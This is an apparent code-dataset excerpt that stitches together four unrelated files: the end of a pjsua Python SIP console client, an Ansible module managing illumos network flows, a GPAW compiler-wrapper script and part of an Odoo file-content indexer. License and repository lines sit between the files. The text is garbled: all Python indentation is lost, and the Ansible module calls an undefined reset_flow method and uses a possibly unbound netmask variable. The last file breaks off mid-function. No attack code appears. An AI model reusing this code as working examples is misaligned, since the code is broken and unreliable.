# Create and initialize pjsua config
# Note: for this Python module, thread_cnt must be 0 since Python
# doesn't like to be called from alien thread (pjsua's thread
# in this case)
ua_cfg = py_pjsua.config_default()
ua_cfg.thread_cnt = 0
ua_cfg.user_agent = "PJSUA/Python 0.1"
ua_cfg.cb.on_incoming_call = on_incoming_call
ua_cfg.cb.on_call_media_state = on_call_media_state
ua_cfg.cb.on_reg_state = on_reg_state
ua_cfg.cb.on_call_state = on_call_state
ua_cfg.cb.on_buddy_state = on_buddy_state
ua_cfg.cb.on_pager = on_pager
ua_cfg.cb.on_pager_status = on_pager_status
ua_cfg.cb.on_typing = on_typing
ua_cfg.cb.on_call_transfer_status = on_call_transfer_status
ua_cfg.cb.on_call_transfer_request = on_call_transfer_request
# Configure STUN setting
if C_STUN_HOST != "":
ua_cfg.stun_host = C_STUN_HOST;
# Create and initialize media config
med_cfg = py_pjsua.media_config_default()
med_cfg.ec_tail_len = 0
#
# Initialize pjsua!!
#
status = py_pjsua.init(ua_cfg, log_cfg, med_cfg)
if status != 0:
err_exit("pjsua init() error", status)
# Configure UDP transport config
transport_cfg = py_pjsua.transport_config_default()
transport_cfg.port = C_SIP_PORT
# Create UDP transport
status, transport_id = \
py_pjsua.transport_create(py_pjsua.PJSIP_TRANSPORT_UDP, transport_cfg)
if status != 0:
err_exit("Error creating UDP transport", status)
# Create initial default account
status, acc_id = py_pjsua.acc_add_local(transport_id, 1)
if status != 0:
err_exit("Error creating account", status)
g_acc_id = acc_id
g_ua_cfg = ua_cfg
# Add SIP account interractively
#
def add_account():
global g_acc_id
acc_domain = ""
acc_username = ""
acc_passwd =""
confirm = ""
# Input account configs
print "Your SIP domain (e.g. myprovider.com): ",
acc_domain = sys.stdin.readline()
if acc_domain == "\n":
return
acc_domain = acc_domain.replace("\n", "")
print "Your username (e.g. alice): ",
acc_username = sys.stdin.readline()
if acc_username == "\n":
return
acc_username = acc_username.replace("\n", "")
print "Your password (e.g. secret): ",
acc_passwd = sys.stdin.readline()
if acc_passwd == "\n":
return
acc_passwd = acc_passwd.replace("\n", "")
# Configure account configuration
acc_cfg = py_pjsua.acc_config_default()
acc_cfg.id = "sip:" + acc_username + "@" + acc_domain
acc_cfg.reg_uri = "sip:" + acc_domain
cred_info = py_pjsua.Pjsip_Cred_Info()
cred_info.realm = "*"
cred_info.scheme = "digest"
cred_info.username = acc_username
cred_info.data_type = 0
cred_info.data = acc_passwd
acc_cfg.cred_info.append(1)
acc_cfg.cred_info[0] = cred_info
# Add new SIP account
status, acc_id = py_pjsua.acc_add(acc_cfg, 1)
if status != 0:
py_pjsua.perror(THIS_FILE, "Error adding SIP account", status)
else:
g_acc_id = acc_id
write_log(3, "Account " + acc_cfg.id + " added")
def add_player():
global g_wav_files
global g_wav_id
global g_wav_port
file_name = ""
status = -1
wav_id = 0
print "Enter the path of the file player(e.g. /tmp/audio.wav): ",
file_name = sys.stdin.readline()
if file_name == "\n":
return
file_name = file_name.replace("\n", "")
status, wav_id = py_pjsua.player_create(file_name, 0)
if status != 0:
py_pjsua.perror(THIS_FILE, "Error adding file player ", status)
else:
g_wav_files.append(file_name)
if g_wav_id == 0:
g_wav_id = wav_id
g_wav_port = py_pjsua.player_get_conf_port(wav_id)
write_log(3, "File player " + file_name + " added")
def add_recorder():
global g_rec_file
global g_rec_id
global g_rec_port
file_name = ""
status = -1
rec_id = 0
print "Enter the path of the file recorder(e.g. /tmp/audio.wav): ",
file_name = sys.stdin.readline()
if file_name == "\n":
return
file_name = file_name.replace("\n", "")
status, rec_id = py_pjsua.recorder_create(file_name, 0, None, 0, 0)
if status != 0:
py_pjsua.perror(THIS_FILE, "Error adding file recorder ", status)
else:
g_rec_file = file_name
g_rec_id = rec_id
g_rec_port = py_pjsua.recorder_get_conf_port(rec_id)
write_log(3, "File recorder " + file_name + " added")
def conf_list():
ports = None
print "Conference ports : "
ports = py_pjsua.enum_conf_ports()
for port in ports:
info = None
info = py_pjsua.conf_get_port_info(port)
txlist = ""
for listener in info.listeners:
txlist = txlist + "#" + `listener` + " "
print "Port #" + `info.slot_id` + "[" + `(info.clock_rate/1000)` + "KHz/" + `(info.samples_per_frame * 1000 / info.clock_rate)` + "ms] " + info.name + " transmitting to: " + txlist
def connect_port():
src_port = 0
dst_port = 0
print "Connect src port # (empty to cancel): "
src_port = sys.stdin.readline()
if src_port == "\n":
return
src_port = src_port.replace("\n", "")
src_port = int(src_port)
print "To dst port # (empty to cancel): "
dst_port = sys.stdin.readline()
if dst_port == "\n":
return
dst_port = dst_port.replace("\n", "")
dst_port = int(dst_port)
status = py_pjsua.conf_connect(src_port, dst_port)
if status != 0:
py_pjsua.perror(THIS_FILE, "Error connecting port ", status)
else:
write_log(3, "Port connected from " + `src_port` + " to " + `dst_port`)
def disconnect_port():
src_port = 0
dst_port = 0
print "Disconnect src port # (empty to cancel): "
src_port = sys.stdin.readline()
if src_port == "\n":
return
src_port = src_port.replace("\n", "")
src_port = int(src_port)
print "From dst port # (empty to cancel): "
dst_port = sys.stdin.readline()
if dst_port == "\n":
return
dst_port = dst_port.replace("\n", "")
dst_port = int(dst_port)
status = py_pjsua.conf_disconnect(src_port, dst_port)
if status != 0:
py_pjsua.perror(THIS_FILE, "Error disconnecting port ", status)
else:
write_log(3, "Port disconnected " + `src_port` + " from " + `dst_port`)
def dump_call_quality():
global g_current_call
buf = ""
if g_current_call != -1:
buf = py_pjsua.call_dump(g_current_call, 1, 1024, " ")
write_log(3, "\n" + buf)
else:
write_log(3, "No current call")
def xfer_call():
global g_current_call
if g_current_call == -1:
write_log(3, "No current call")
else:
call = g_current_call
ci = py_pjsua.call_get_info(g_current_call)
print "Transferring current call ["+ `g_current_call` + "] " + ci.remote_info
print "Enter sip url : "
url = sys.stdin.readline()
if url == "\n":
return
url = url.replace("\n", "")
if call != g_current_call:
print "Call has been disconnected"
return
msg_data = py_pjsua.msg_data_init()
status = py_pjsua.call_xfer(g_current_call, url, msg_data);
if status != 0:
py_pjsua.perror(THIS_FILE, "Error transferring call ", status)
else:
write_log(3, "Call transferred to " + url)
def xfer_call_replaces():
if g_current_call == -1:
write_log(3, "No current call")
else:
call = g_current_call
ids = py_pjsua.enum_calls()
if len(ids) <= 1:
print "There are no other calls"
return
ci = py_pjsua.call_get_info(g_current_call)
print "Transfer call [" + `g_current_call` + "] " + ci.remote_info + " to one of the following:"
for i in range(0, len(ids)):
if ids[i] == call:
continue
call_info = py_pjsua.call_get_info(ids[i])
print `ids[i]` + " " + call_info.remote_info + " [" + call_info.state_text + "]"
print "Enter call number to be replaced : "
buf = sys.stdin.readline()
buf = buf.replace("\n","")
if buf == "":
return
dst_call = int(buf)
if call != g_current_call:
print "Call has been disconnected"
return
if dst_call == call:
print "Destination call number must not be the same as the call being transferred"
return
if dst_call >= py_pjsua.PJSUA_MAX_CALLS:
print "Invalid destination call number"
return
if py_pjsua.call_is_active(dst_call) == 0:
print "Invalid destination call number"
return
py_pjsua.call_xfer_replaces(call, dst_call, 0, None)
#
# Worker thread function.
# Python doesn't like it when it's called from an alien thread
# (pjsua's worker thread, in this case), so for Python we must
# disable worker thread in pjsua and poll pjsua from Python instead.
#
def worker_thread_main(arg):
global C_QUIT
thread_desc = 0;
status = py_pjsua.thread_register("python worker", thread_desc)
if status != 0:
py_pjsua.perror(THIS_FILE, "Error registering thread", status)
else:
while C_QUIT == 0:
py_pjsua.handle_events(50)
print "Worker thread quitting.."
C_QUIT = 2
# Start pjsua
#
def app_start():
# Done with initialization, start pjsua!!
#
status = py_pjsua.start()
if status != 0:
err_exit("Error starting pjsua!", status)
# Start worker thread
thr = thread.start_new(worker_thread_main, (0,))
print "PJSUA Started!!"
# Print account and buddy list
def print_acc_buddy_list():
global g_acc_id
acc_ids = py_pjsua.enum_accs()
print "Account list:"
for acc_id in acc_ids:
acc_info = py_pjsua.acc_get_info(acc_id)
if acc_info.has_registration == 0:
acc_status = acc_info.status_text
else:
acc_status = `acc_info.status` + "/" + acc_info.status_text + " (expires=" + `acc_info.expires` + ")"
if acc_id == g_acc_id:
print " *",
else:
print " ",
print "[" + `acc_id` + "] " + acc_info.acc_uri + ": " + acc_status
print " Presence status: ",
if acc_info.online_status != 0:
print "Online"
else:
print "Invisible"
if py_pjsua.get_buddy_count() > 0:
print ""
print "Buddy list:"
buddy_ids = py_pjsua.enum_buddies()
for buddy_id in buddy_ids:
bi = py_pjsua.buddy_get_info(buddy_id)
print " [" + `buddy_id` + "] " + bi.status_text + " " + bi.uri
# Print application menu
#
def print_menu():
print ""
print ">>>"
print_acc_buddy_list()
print """
+============================================================================+
| Call Commands : | Buddy, IM & Presence: | Account: |
| | | |
| m Make call | +b Add buddy | +a Add account |
| a Answer current call | -b Delete buddy | -a Delete accnt |
| h Hangup current call | | |
| H Hold call | i Send instant message | rr register |
| v re-inVite (release Hold) | s Subscribe presence | ru Unregister |
| # Send DTMF string | u Unsubscribe presence | |
| dq Dump curr. call quality | t ToGgle Online status | |
| +--------------------------+------------------+
| x Xfer call | Media Commands: | Status: |
| X Xfer with Replaces | | |
| | cl List ports | d Dump status |
| | cc Connect port | dd Dump detail |
| | cd Disconnect port | |
| | +p Add file player | |
|------------------------------+ +r Add file recorder | |
| q Quit application | | |
+============================================================================+"""
print "You have " + `py_pjsua.call_get_count()` + " active call(s)"
print ">>>",
# Menu
#
def app_menu():
global g_acc_id
global g_current_call
quit = 0
while quit == 0:
print_menu()
choice = sys.stdin.readline()
if choice[0] == "q":
quit = 1
elif choice[0] == "i":
# Sending IM
print "Send IM to SIP URL: ",
url = sys.stdin.readline()
if url == "\n":
continue
# Send typing indication
py_pjsua.im_typing(g_acc_id, url, 1, None)
print "The content: ",
message = sys.stdin.readline()
if message == "\n":
py_pjsua.im_typing(g_acc_id, url, 0, None)
continue
# Send the IM!
py_pjsua.im_send(g_acc_id, url, None, message, None, 0)
elif choice[0] == "m":
# Make call
print "Using account ", g_acc_id
print "Make call to SIP URL: ",
url = sys.stdin.readline()
url = url.replace("\n", "")
if url == "":
continue
# Initiate the call!
status, call_id = py_pjsua.call_make_call(g_acc_id, url, 0, 0, None)
if status != 0:
py_pjsua.perror(THIS_FILE, "Error making call", status)
else:
g_current_call = call_id
elif choice[0] == "+" and choice[1] == "b":
# Add new buddy
bc = py_pjsua.Buddy_Config()
print "Buddy URL: ",
bc.uri = sys.stdin.readline()
if bc.uri == "\n":
continue
bc.uri = bc.uri.replace("\n", "")
bc.subscribe = 1
status, buddy_id = py_pjsua.buddy_add(bc)
if status != 0:
py_pjsua.perror(THIS_FILE, "Error adding buddy", status)
elif choice[0] == "-" and choice[1] == "b":
print "Enter buddy ID to delete : "
buf = sys.stdin.readline()
buf = buf.replace("\n","")
if buf == "":
continue
i = int(buf)
if py_pjsua.buddy_is_valid(i) == 0:
print "Invalid buddy id " + `i`
else:
py_pjsua.buddy_del(i)
print "Buddy " + `i` + " deleted"
elif choice[0] == "+" and choice[1] == "a":
# Add account
add_account()
elif choice[0] == "-" and choice[1] == "a":
print "Enter account ID to delete : "
buf = sys.stdin.readline()
buf = buf.replace("\n","")
if buf == "":
continue
i = int(buf)
if py_pjsua.acc_is_valid(i) == 0:
print "Invalid account id " + `i`
else:
py_pjsua.acc_del(i)
print "Account " + `i` + " deleted"
elif choice[0] == "+" and choice[1] == "p":
add_player()
elif choice[0] == "+" and choice[1] == "r":
add_recorder()
elif choice[0] == "c" and choice[1] == "l":
conf_list()
elif choice[0] == "c" and choice[1] == "c":
connect_port()
elif choice[0] == "c" and choice[1] == "d":
disconnect_port()
elif choice[0] == "d" and choice[1] == "q":
dump_call_quality()
elif choice[0] == "x":
xfer_call()
elif choice[0] == "X":
xfer_call_replaces()
elif choice[0] == "h":
if g_current_call != py_pjsua.PJSUA_INVALID_ID:
py_pjsua.call_hangup(g_current_call, 603, None, None)
else:
print "No current call"
elif choice[0] == "H":
if g_current_call != py_pjsua.PJSUA_INVALID_ID:
py_pjsua.call_set_hold(g_current_call, None)
else:
print "No current call"
elif choice[0] == "v":
if g_current_call != py_pjsua.PJSUA_INVALID_ID:
py_pjsua.call_reinvite(g_current_call, 1, None);
else:
print "No current call"
elif choice[0] == "#":
if g_current_call == py_pjsua.PJSUA_INVALID_ID:
print "No current call"
elif py_pjsua.call_has_media(g_current_call) == 0:
print "Media is not established yet!"
else:
call = g_current_call
print "DTMF strings to send (0-9*#A-B)"
buf = sys.stdin.readline()
buf = buf.replace("\n", "")
if buf == "":
continue
if call != g_current_call:
print "Call has been disconnected"
continue
status = py_pjsua.call_dial_dtmf(g_current_call, buf)
if status != 0:
py_pjsua.perror(THIS_FILE, "Unable to send DTMF", status);
else:
print "DTMF digits enqueued for transmission"
elif choice[0] == "s":
print "Subscribe presence of (buddy id) : "
buf = sys.stdin.readline()
buf = buf.replace("\n","")
if buf == "":
continue
i = int(buf)
py_pjsua.buddy_subscribe_pres(i, 1)
elif choice[0] == "u":
print "Unsubscribe presence of (buddy id) : "
buf = sys.stdin.readline()
buf = buf.replace("\n","")
if buf == "":
continue
i = int(buf)
py_pjsua.buddy_subscribe_pres(i, 0)
elif choice[0] == "t":
acc_info = py_pjsua.acc_get_info(g_acc_id)
if acc_info.online_status == 0:
acc_info.online_status = 1
else:
acc_info.online_status = 0
py_pjsua.acc_set_online_status(g_acc_id, acc_info.online_status)
st = ""
if acc_info.online_status == 0:
st = "offline"
else:
st = "online"
print "Setting " + acc_info.acc_uri + " online status to " + st
elif choice[0] == "r":
if choice[1] == "r":
py_pjsua.acc_set_registration(g_acc_id, 1)
elif choice[1] == "u":
py_pjsua.acc_set_registration(g_acc_id, 0)
elif choice[0] == "d":
py_pjsua.dump(choice[1] == "d")
elif choice[0] == "a":
if g_current_call != py_pjsua.PJSUA_INVALID_ID:
py_pjsua.call_answer(g_current_call, 200, None, None)
else:
print "No current call"
#
# main
#
app_init()
app_start()
app_menu()
#
# Done, quitting..
#
print "PJSUA shutting down.."
C_QUIT = 1
# Give the worker thread chance to quit itself
while C_QUIT != 2:
py_pjsua.handle_events(50)
print "PJSUA destroying.."
py_pjsua.destroy()
|
gpl-2.0
|
wimnat/ansible-modules-extras
|
network/illumos/flowadm.py
|
29
|
15000
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Adam Števko <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = '''
---
module: flowadm
short_description: Manage bandwidth resource control and priority for protocols, services and zones.
description:
- Create/modify/remove networking bandwidth and associated resources for a type of traffic on a particular link.
version_added: "2.2"
author: Adam Števko (@xen0l)
options:
name:
description: >
- A flow is defined as a set of attributes based on Layer 3 and Layer 4
headers, which can be used to identify a protocol, service, or a zone.
required: true
aliases: [ 'flow' ]
link:
description:
- Specifiies a link to configure flow on.
required: false
local_ip:
description:
- Identifies a network flow by the local IP address.
required: false
remove_ip:
description:
- Identifies a network flow by the remote IP address.
required: false
transport:
description: >
- Specifies a Layer 4 protocol to be used. It is typically used in combination with I(local_port) to
identify the service that needs special attention.
required: false
local_port:
description:
- Identifies a service specified by the local port.
required: false
dsfield:
description: >
- Identifies the 8-bit differentiated services field (as defined in
RFC 2474). The optional dsfield_mask is used to state the bits of interest in
the differentiated services field when comparing with the dsfield
value. Both values must be in hexadecimal.
required: false
maxbw:
description: >
- Sets the full duplex bandwidth for the flow. The bandwidth is
specified as an integer with one of the scale suffixes(K, M, or G
for Kbps, Mbps, and Gbps). If no units are specified, the input
value will be read as Mbps.
required: false
priority:
description:
- Sets the relative priority for the flow.
required: false
default: 'medium'
choices: [ 'low', 'medium', 'high' ]
temporary:
description:
- Specifies that the configured flow is temporary. Temporary
flows do not persist across reboots.
required: false
default: false
choices: [ "true", "false" ]
state:
description:
- Create/delete/enable/disable an IP address on the network interface.
required: false
default: present
choices: [ 'absent', 'present', 'resetted' ]
'''
EXAMPLES = '''
# Limit SSH traffic to 100M via vnic0 interface
flowadm: link=vnic0 flow=ssh_out transport=tcp local_port=22 maxbw=100M state=present
# Reset flow properties
flowadm: name=dns state=resetted
# Configure policy for EF PHB (DSCP value of 101110 from RFC 2598) with a bandwidth of 500 Mbps and a high priority.
flowadm: link=bge0 dsfield=0x2e:0xfc maxbw=500M priority=high flow=efphb-flow state=present
'''
RETURN = '''
name:
description: flow name
returned: always
type: string
sample: "http_drop"
link:
description: flow's link
returned: if link is defined
type: string
sample: "vnic0"
state:
description: state of the target
returned: always
type: string
sample: "present"
temporary:
description: flow's persistence
returned: always
type: boolean
sample: "True"
priority:
description: flow's priority
returned: if priority is defined
type: string
sample: "low"
transport:
description: flow's transport
returned: if transport is defined
type: string
sample: "tcp"
maxbw:
description: flow's maximum bandwidth
returned: if maxbw is defined
type: string
sample: "100M"
local_Ip:
description: flow's local IP address
returned: if local_ip is defined
type: string
sample: "10.0.0.42"
local_port:
description: flow's local port
returned: if local_port is defined
type: int
sample: 1337
remote_Ip:
description: flow's remote IP address
returned: if remote_ip is defined
type: string
sample: "10.0.0.42"
dsfield:
description: flow's differentiated services value
returned: if dsfield is defined
type: string
sample: "0x2e:0xfc"
'''
import socket
SUPPORTED_TRANSPORTS = ['tcp', 'udp', 'sctp', 'icmp', 'icmpv6']
SUPPORTED_PRIORITIES = ['low', 'medium', 'high']
SUPPORTED_ATTRIBUTES = ['local_ip', 'remote_ip', 'transport', 'local_port', 'dsfield']
SUPPORTPED_PROPERTIES = ['maxbw', 'priority']
class Flow(object):
def __init__(self, module):
self.module = module
self.name = module.params['name']
self.link = module.params['link']
self.local_ip = module.params['local_ip']
self.remote_ip = module.params['remote_ip']
self.transport = module.params['transport']
self.local_port = module.params['local_port']
self.dsfield = module.params['dsfield']
self.maxbw = module.params['maxbw']
self.priority = module.params['priority']
self.temporary = module.params['temporary']
self.state = module.params['state']
self._needs_updating = {
'maxbw': False,
'priority': False,
}
@classmethod
def is_valid_port(cls, port):
return 1 <= int(port) <= 65535
@classmethod
def is_valid_address(cls, ip):
if ip.count('/') == 1:
ip_address, netmask = ip.split('/')
else:
ip_address = ip
if len(ip_address.split('.')) == 4:
try:
socket.inet_pton(socket.AF_INET, ip_address)
except socket.error:
return False
if not 0 <= netmask <= 32:
return False
else:
try:
socket.inet_pton(socket.AF_INET6, ip_address)
except socket.error:
return False
if not 0 <= netmask <= 128:
return False
return True
@classmethod
def is_hex(cls, number):
try:
int(number, 16)
except ValueError:
return False
return True
@classmethod
def is_valid_dsfield(cls, dsfield):
dsmask = None
if dsfield.count(':') == 1:
dsval = dsfield.split(':')[0]
else:
dsval, dsmask = dsfield.split(':')
if dsmask and not 0x01 <= int(dsmask, 16) <= 0xff and not 0x01 <= int(dsval, 16) <= 0xff:
return False
elif not 0x01 <= int(dsval, 16) <= 0xff:
return False
return True
def flow_exists(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('show-flow')
cmd.append(self.name)
(rc, _, _) = self.module.run_command(cmd)
if rc == 0:
return True
else:
return False
def delete_flow(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('remove-flow')
if self.temporary:
cmd.append('-t')
cmd.append(self.name)
return self.module.run_command(cmd)
def create_flow(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('add-flow')
cmd.append('-l')
cmd.append(self.link)
if self.local_ip:
cmd.append('-a')
cmd.append('local_ip=' + self.local_ip)
if self.remote_ip:
cmd.append('-a')
cmd.append('remote_ip=' + self.remote_ip)
if self.transport:
cmd.append('-a')
cmd.append('transport=' + self.transport)
if self.local_port:
cmd.append('-a')
cmd.append('local_port=' + self.local_port)
if self.dsfield:
cmd.append('-a')
cmd.append('dsfield=' + self.dsfield)
if self.maxbw:
cmd.append('-p')
cmd.append('maxbw=' + self.maxbw)
if self.priority:
cmd.append('-p')
cmd.append('priority=' + self.priority)
if self.temporary:
cmd.append('-t')
cmd.append(self.name)
return self.module.run_command(cmd)
def _query_flow_props(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('show-flowprop')
cmd.append('-c')
cmd.append('-o')
cmd.append('property,possible')
cmd.append(self.name)
return self.module.run_command(cmd)
def flow_needs_udpating(self):
(rc, out, err) = self._query_flow_props()
NEEDS_UPDATING = False
if rc == 0:
properties = (line.split(':') for line in out.rstrip().split('\n'))
for prop, value in properties:
if prop == 'maxbw' and self.maxbw != value:
self._needs_updating.update({prop: True})
NEEDS_UPDATING = True
elif prop == 'priority' and self.priority != value:
self._needs_updating.update({prop: True})
NEEDS_UPDATING = True
return NEEDS_UPDATING
else:
self.module.fail_json(msg='Error while checking flow properties: %s' % err,
stderr=err,
rc=rc)
def update_flow(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('set-flowprop')
if self.maxbw and self._needs_updating['maxbw']:
cmd.append('-p')
cmd.append('maxbw=' + self.maxbw)
if self.priority and self._needs_updating['priority']:
cmd.append('-p')
cmd.append('priority=' + self.priority)
if self.temporary:
cmd.append('-t')
cmd.append(self.name)
return self.module.run_command(cmd)
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(required=True, aliases=['flow']),
link=dict(required=False),
local_ip=dict(required=False),
remote_ip=dict(required=False),
transport=dict(required=False, choices=SUPPORTED_TRANSPORTS),
local_port=dict(required=False),
dsfield=dict(required=False),
maxbw=dict(required=False),
priority=dict(required=False,
default='medium',
choices=SUPPORTED_PRIORITIES),
temporary=dict(default=False, type='bool'),
state=dict(required=False,
default='present',
choices=['absent', 'present', 'resetted']),
),
mutually_exclusive=[
('local_ip', 'remote_ip'),
('local_ip', 'transport'),
('local_ip', 'local_port'),
('local_ip', 'dsfield'),
('remote_ip', 'transport'),
('remote_ip', 'local_port'),
('remote_ip', 'dsfield'),
('transport', 'dsfield'),
('local_port', 'dsfield'),
],
supports_check_mode=True
)
flow = Flow(module)
rc = None
out = ''
err = ''
result = {}
result['name'] = flow.name
result['state'] = flow.state
result['temporary'] = flow.temporary
if flow.link:
result['link'] = flow.link
if flow.maxbw:
result['maxbw'] = flow.maxbw
if flow.priority:
result['priority'] = flow.priority
if flow.local_ip:
if flow.is_valid_address(flow.local_ip):
result['local_ip'] = flow.local_ip
if flow.remote_ip:
if flow.is_valid_address(flow.remote_ip):
result['remote_ip'] = flow.remote_ip
if flow.transport:
result['transport'] = flow.transport
if flow.local_port:
if flow.is_valid_port(flow.local_port):
result['local_port'] = flow.local_port
else:
module.fail_json(msg='Invalid port: %s' % flow.local_port,
rc=1)
if flow.dsfield:
if flow.is_valid_dsfield(flow.dsfield):
result['dsfield'] = flow.dsfield
else:
module.fail_json(msg='Invalid dsfield: %s' % flow.dsfield,
rc=1)
if flow.state == 'absent':
if flow.flow_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = flow.delete_flow()
if rc != 0:
module.fail_json(msg='Error while deleting flow: "%s"' % err,
name=flow.name,
stderr=err,
rc=rc)
elif flow.state == 'present':
if not flow.flow_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = flow.create_flow()
if rc != 0:
module.fail_json(msg='Error while creating flow: "%s"' % err,
name=flow.name,
stderr=err,
rc=rc)
else:
if flow.flow_needs_udpating():
(rc, out, err) = flow.update_flow()
if rc != 0:
module.fail_json(msg='Error while updating flow: "%s"' % err,
name=flow.name,
stderr=err,
rc=rc)
elif flow.state == 'resetted':
if flow.flow_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = flow.reset_flow()
if rc != 0:
module.fail_json(msg='Error while resetting flow: "%s"' % err,
name=flow.name,
stderr=err,
rc=rc)
if rc is None:
result['changed'] = False
else:
result['changed'] = True
if out:
result['stdout'] = out
if err:
result['stderr'] = err
module.exit_json(**result)
from ansible.module_utils.basic import *
main()
|
gpl-3.0
|
mlouhivu/build-recipes
|
gpaw/examples/sisu-1.3.0/gcc.py
|
3
|
2014
|
#!/usr/bin/env python
"""Wrapper for the GNU compiler that converts / removes incompatible
compiler options and allows for file-specific tailoring."""
import sys
from subprocess import call
# Default compiler and options
compiler = 'gcc'
args2change = {}
fragile_files = ['c/xc/tpss.c']
# Default optimisation settings
default_level = 3
default_flags = ['-funroll-loops']
fragile_level = 2
fragile_flags = []
# Sisu (Cray XC40)
if True:
compiler = 'cc'
default_flags += ['-march=haswell -mtune=haswell -mavx2']
fragile_files += ['c/xc/revtpss.c']
# Taito (HP cluster)
if not True:
compiler = 'mpicc'
default_flags += ['-ffast-math -march=sandybridge -mtune=haswell']
optimise = None # optimisation level 0/1/2/3
debug = False # use -g or not
fragile = False # use special flags for current file?
sandwich = True # use optimisation flag twice (= no override possible)
# process arguments
args = []
for arg in sys.argv[1:]:
arg = arg.strip()
if arg.startswith('-O'):
level = int(arg.replace('-O',''))
if not optimise or level > optimise:
optimise = level
elif arg == '-g':
debug = True
elif arg in args2change:
if args2change[arg]:
args.append(args2change[arg])
else:
if arg in fragile_files:
fragile = True
args.append(arg)
# set default optimisation level and flags
if fragile:
optimise = min(fragile_level, optimise)
flags = fragile_flags
else:
optimise = max(default_level, optimise)
flags = default_flags
# add optimisation level to flags
if optimise is not None:
flags.insert(0, '-O{0}'.format(optimise))
if sandwich:
args.append('-O{0}'.format(optimise))
# make sure -g is always the _first_ flag, so it doesn't mess e.g. with the
# optimisation level
if debug:
flags.insert(0, '-g')
# construct and execute the compile command
cmd = '{0} {1} {2}'.format(compiler, ' '.join(flags), ' '.join(args))
print(cmd)
call(cmd, shell=True)
|
mit
|
valdecdev/odoo
|
addons/document/std_index.py
|
1
|
6502
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from content_index import indexer, cntIndex
from subprocess import Popen, PIPE
import StringIO
import odt2txt
import sys, zipfile, xml.dom.minidom
import logging
_logger = logging.getLogger(__name__)
def _to_unicode(s):
try:
return s.decode('utf-8')
except UnicodeError:
try:
return s.decode('latin')
except UnicodeError:
try:
return s.encode('ascii')
except UnicodeError:
return s
def textToString(element):
buffer = u""
for node in element.childNodes :
if node.nodeType == xml.dom.Node.TEXT_NODE :
buffer += node.nodeValue
elif node.nodeType == xml.dom.Node.ELEMENT_NODE :
buffer += textToString(node)
return buffer
class TxtIndex(indexer):
def _getMimeTypes(self):
return ['text/plain','text/html','text/diff','text/xml', 'text/*',
'application/xml']
def _getExtensions(self):
return ['.txt', '.py']
def _doIndexContent(self, content):
return content
cntIndex.register(TxtIndex())
class PptxIndex(indexer):
def _getMimeTypes(self):
return [ 'application/vnd.openxmlformats-officedocument.presentationml.presentation']
def _getExtensions(self):
return ['.pptx']
def _doIndexFile(self, fname):
def toString () :
""" Converts the document to a string. """
buffer = u""
for val in ["a:t"]:
for paragraph in content.getElementsByTagName(val) :
buffer += textToString(paragraph) + "\n"
return buffer
data = []
zip = zipfile.ZipFile(fname)
files = filter(lambda x: x.startswith('ppt/slides/slide'), zip.namelist())
for i in range(1, len(files) + 1):
content = xml.dom.minidom.parseString(zip.read('ppt/slides/slide%s.xml' % str(i)))
res = toString().encode('ascii','replace')
data.append(res)
return _to_unicode('\n'.join(data))
cntIndex.register(PptxIndex())
class DocIndex(indexer):
def _getMimeTypes(self):
return [ 'application/ms-word']
def _getExtensions(self):
return ['.doc']
def _doIndexFile(self, fname):
try:
pop = Popen(['antiword', fname], shell=False, stdout=PIPE)
(data, _) = pop.communicate()
return _to_unicode(data)
except OSError:
_logger.warning("Failed attempt to execute antiword (MS Word reader). Antiword is necessary to index the file %s of MIME type %s. Detailed error available at DEBUG level.", fname, self._getMimeTypes()[0])
_logger.debug("Trace of the failed file indexing attempt.", exc_info=True)
return u''
cntIndex.register(DocIndex())
class DocxIndex(indexer):
def _getMimeTypes(self):
return [ 'application/vnd.openxmlformats-officedocument.wordprocessingml.document']
def _getExtensions(self):
return ['.docx']
def _doIndexFile(self, fname):
zip = zipfile.ZipFile(fname)
content = xml.dom.minidom.parseString(zip.read("word/document.xml"))
def toString () :
""" Converts the document to a string. """
buffer = u""
for val in ["w:p", "w:h", "text:list"]:
for paragraph in content.getElementsByTagName(val) :
buffer += textToString(paragraph) + "\n"
return buffer
res = toString().encode('ascii','replace')
return _to_unicode(res)
cntIndex.register(DocxIndex())
class XlsxIndex(indexer):
def _getMimeTypes(self):
return [ 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet']
def _getExtensions(self):
return ['.xlsx']
def _doIndexFile(self, fname):
zip = zipfile.ZipFile(fname)
content = xml.dom.minidom.parseString(zip.read("xl/sharedStrings.xml"))
def toString () :
""" Converts the document to a string. """
buffer = u""
for val in ["t"]:
for paragraph in content.getElementsByTagName(val) :
buffer += textToString(paragraph) + "\n"
return buffer
res = toString().encode('ascii','replace')
return _to_unicode(res)
cntIndex.register(XlsxIndex())
class PdfIndex(indexer):
def _getMimeTypes(self):
return [ 'application/pdf']
def _getExtensions(self):
return ['.pdf']
def _doIndexFile(self, fname):
try:
pop = Popen(['pdftotext', '-enc', 'UTF-8', '-nopgbrk', fname, '-'], shell=False, stdout=PIPE)
(data, _) = pop.communicate()
return _to_unicode(data)
except OSError:
_logger.warning("Failed attempt to execute pdftotext. This program is necessary to index the file %s of MIME type %s. Detailed error available at DEBUG level.", fname, self._getMimeTypes()[0])
_logger.debug("Trace of the failed file indexing attempt.", exc_info=True)
return u''
cntIndex.register(PdfIndex())
class ImageNoIndex(indexer):
def _getMimeTypes(self):
return [ 'image/*']
def _getExtensions(self):
#better return no extension, and let 'file' do its magic
